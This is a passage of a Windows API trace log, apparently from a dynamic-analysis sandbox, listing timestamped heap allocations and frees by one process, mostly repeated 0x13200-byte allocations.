Size=0x7a0) returned 0x50a300 [0087.177] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53dd70 | out: hHeap=0x4f0000) returned 1 [0087.177] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.177] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xbf0) returned 0x5093b0 [0087.177] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.177] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50a300 | out: hHeap=0x4f0000) returned 1 [0087.177] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x640) returned 0x5088e0 [0087.177] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1247) returned 0x53d910 [0087.177] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.177] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.177] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x520) returned 0x5088e0 [0087.177] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1b56) returned 0x5093b0 [0087.178] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.178] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8a0) returned 0x53d910 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x28ed) returned 0x50af10 [0087.179] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.179] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x550) returned 0x5088e0 [0087.179] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2537) returned 0x53d910 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x12b7) returned 0x5093b0 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x950) returned 0x50d810 [0087.179] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.179] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.179] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x3d4f) returned 0x50e170 [0087.180] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50af10 | out: hHeap=0x4f0000) returned 1 [0087.180] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50d810 | out: hHeap=0x4f0000) returned 1 [0087.180] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2377) returned 0x53d910 [0087.180] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x11d7) returned 0x511ed0 [0087.337] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8e0) returned 0x5093b0 [0087.338] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.338] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x511ed0 | out: hHeap=0x4f0000) returned 1 [0087.338] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.338] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5b0) returned 0x5088e0 [0087.338] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.338] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x640) returned 0x5088e0 [0087.338] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5be2) returned 0x51db10 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x50e170 | out: hHeap=0x4f0000) returned 1 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x890) returned 0x53d910 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xac0) returned 0x53d910 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20) returned 0x4fb6b0 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x960) returned 0x53d910 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x960) returned 0x53e280 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x460) returned 0x5088e0 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe0f) returned 0x53ebf0 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53e280 | out: hHeap=0x4f0000) returned 1 [0087.339] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1c17) returned 0x523700 [0087.339] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe00) returned 0x53d910 [0087.340] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x700) returned 0x525320 [0087.340] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x523700 | out: hHeap=0x4f0000) returned 1 [0087.340] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.340] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x153d) returned 0x523700 [0087.340] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53ebf0 | out: hHeap=0x4f0000) returned 1 [0087.340] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525320 | out: hHeap=0x4f0000) returned 1 [0087.340] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2277) returned 0x53d910 [0087.340] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1157) returned 0x524c50 [0087.340] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8a0) returned 0x525db0 [0087.340] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x524c50 | out: hHeap=0x4f0000) returned 1 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1fc7) returned 0x53d910 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x523700 | out: hHeap=0x4f0000) returned 1 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x525db0 | out: hHeap=0x4f0000) returned 1 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1657) returned 0x523700 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xb20) returned 0x524d60 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x590) returned 0x5088e0 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x523700 | out: hHeap=0x4f0000) returned 1 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x524d60 | out: hHeap=0x4f0000) returned 1 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2f96) returned 0x523700 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.341] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2b47) returned 0x5266a0 [0087.341] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x15b7) returned 0x53d910 [0087.342] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xad0) returned 0x53eed0 [0087.342] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5266a0 | out: hHeap=0x4f0000) returned 1 [0087.342] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.342] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53eed0 | out: hHeap=0x4f0000) returned 1 [0087.342] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2697) returned 0x53d910 [0087.342] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1367) returned 0x5266a0 [0087.342] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9a0) returned 0x527a10 [0087.342] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.343] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5266a0 | out: hHeap=0x4f0000) returned 1 [0087.343] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x474d) returned 0x5283c0 [0087.343] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x523700 | out: hHeap=0x4f0000) returned 1 [0087.343] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x527a10 | out: hHeap=0x4f0000) returned 1 [0087.343] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x920) returned 0x52cb20 [0087.343] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52cb20 | out: hHeap=0x4f0000) returned 1 [0087.343] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1b47) returned 0x53d910 [0087.343] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xd90) returned 0x52cb20 [0087.343] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x6d0) returned 0x53f460 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52cb20 | out: hHeap=0x4f0000) returned 1 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53f460 | out: hHeap=0x4f0000) returned 1 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x5d0) returned 0x5088e0 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x6adf) returned 0x5093b0 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5283c0 | out: hHeap=0x4f0000) returned 1 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1887) returned 0x53d910 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xc30) returned 0x53f1a0 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x620) returned 0x5088e0 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53f1a0 | out: hHeap=0x4f0000) returned 1 [0087.347] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8f0) returned 0x53d910 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x480) returned 0x5088e0 [0087.347] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x240) returned 0x53e210 [0087.348] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.348] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.348] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53e210 | out: hHeap=0x4f0000) returned 1 [0087.348] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x40) returned 0x500150 [0087.348] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fb6b0 | out: hHeap=0x4f0000) returned 1 [0087.348] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x51db10 | out: hHeap=0x4f0000) returned 1 [0087.349] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.349] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x500150 | out: hHeap=0x4f0000) returned 1 [0087.349] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9900) returned 0x5093b0 [0087.350] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1bf0) returned 0x53d910 [0087.352] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.352] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9937) returned 0x51db10 [0087.353] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20) returned 0x4fb830 [0087.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9900) returned 0x5093b0 [0087.353] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1bf0) returned 0x53d910 [0087.354] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x53d910 | out: hHeap=0x4f0000) returned 1 [0087.354] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x9937) returned 0x53d910 [0087.355] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5093b0 | out: hHeap=0x4f0000) returned 1 [0087.355] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x40) returned 0x500970 [0087.355] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fb830 | out: hHeap=0x4f0000) returned 1 [0087.356] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x513760 | out: hHeap=0x4f0000) returned 1 [0087.356] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x52da10 | out: hHeap=0x4f0000) returned 1 [0087.356] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5000b0 | out: hHeap=0x4f0000) returned 1 [0087.356] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x5093b0 [0087.357] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x527450 [0087.357] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x8) returned 0x4f8cd0 [0087.357] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x547250 [0087.358] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x10) returned 0x509050 [0087.358] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f8cd0 | out: hHeap=0x4f0000) returned 1 [0087.358] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x55a460 [0087.359] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x18) returned 0x5092f0 [0087.359] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x509050 | out: hHeap=0x4f0000) returned 1 [0087.359] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x56d670 [0087.359] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x20) returned 0x4fb6b0 [0087.359] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5092f0 | out: hHeap=0x4f0000) returned 1 [0087.359] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x580880 [0087.360] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x30) returned 0x508560 [0087.360] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fb6b0 | out: hHeap=0x4f0000) returned 1 [0087.360] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x593a90 [0087.360] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x5a6ca0 [0087.361] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x48) returned 0x5008d0 [0087.361] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x508560 | out: hHeap=0x4f0000) returned 1 [0087.361] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x5b9eb0 [0087.361] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x5cd0c0 [0087.362] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e10080 [0087.363] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x68) returned 0x4f8cd0 [0087.363] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5008d0 | out: hHeap=0x4f0000) returned 1 [0087.363] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e23290 [0087.363] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e364a0 [0087.364] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e496b0 [0087.364] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e5c8c0 [0087.364] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x98) returned 0x4f5080 [0087.364] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f8cd0 | out: hHeap=0x4f0000) returned 1 [0087.365] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e6fad0 [0087.365] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e82ce0 [0087.366] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1e95ef0 [0087.366] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1ea9100 [0087.367] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1ebc310 [0087.367] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1ecf520 [0087.367] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0xe0) returned 0x4f8cd0 [0087.367] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f5080 | out: hHeap=0x4f0000) returned 1 [0087.367] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1ee2730 [0087.368] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1fa0080 [0087.369] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1fb3290 [0087.369] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1fc64a0 [0087.369] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1fd96b0 [0087.370] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1fec8c0 [0087.370] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x1fffad0 [0087.371] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2012ce0 [0087.371] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2025ef0 [0087.371] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x150) returned 0x4fb080 [0087.371] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4f8cd0 | out: hHeap=0x4f0000) returned 1 [0087.371] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2039100 [0087.372] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x204c310 [0087.372] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x205f520 [0087.373] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2072730 [0087.373] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2085940 [0087.374] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2098b50 [0087.374] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x20abd60 [0087.375] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x20bef70 [0087.375] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x20d2180 [0087.375] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x20e5390 [0087.546] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x20f85a0 [0087.546] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x210b7b0 [0087.547] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x211e9c0 [0087.547] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2131bd0 [0087.547] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x1f8) returned 0x5088e0 [0087.547] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x4fb080 | out: hHeap=0x4f0000) returned 1 [0087.547] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2144de0 [0087.548] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2157ff0 [0087.548] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x216b200 [0087.548] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x217e410 [0087.549] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x21a0080 [0087.549] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x21b3290 [0087.550] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x21c64a0 [0087.550] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x21d96b0 [0087.550] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x21ec8c0 [0087.551] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x21ffad0 [0087.551] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2212ce0 [0087.552] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2225ef0 [0087.552] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2239100 [0087.552] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x224c310 [0087.553] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x225f520 [0087.553] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2272730 [0087.554] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2285940 [0087.554] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2298b50 [0087.554] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x22abd60 [0087.555] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x22bef70 [0087.555] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x22d2180 [0087.556] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x2f0) returned 0x508ae0 [0087.556] HeapFree (in: hHeap=0x4f0000, dwFlags=0x0, lpMem=0x5088e0 | out: hHeap=0x4f0000) returned 1 [0087.556] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x22e5390 [0087.556] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x22f85a0 [0087.556] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x230b7b0 [0087.557] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x231e9c0 [0087.557] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2331bd0 [0087.557] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2344de0 [0087.558] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2357ff0 [0087.558] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x236b200 [0087.558] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x237e410 [0087.559] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2391620 [0087.559] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x23a4830 [0087.559] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x23b7a40 [0087.560] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x23cac50 [0087.560] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x23dde60 [0087.560] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x23f1070 [0087.561] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2404280 [0087.561] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2417490 [0087.562] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x242a6a0 [0087.562] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x243d8b0 [0087.563] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2450ac0 [0087.563] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2463cd0 [0087.564] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x2476ee0 [0087.564] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x248a0f0 [0087.565] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x249d300 [0087.565] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x24b0510 [0087.565] RtlAllocateHeap (HeapHandle=0x4f0000, Flags=0x0, Size=0x13200) returned 0x24c3720 [0087.566] 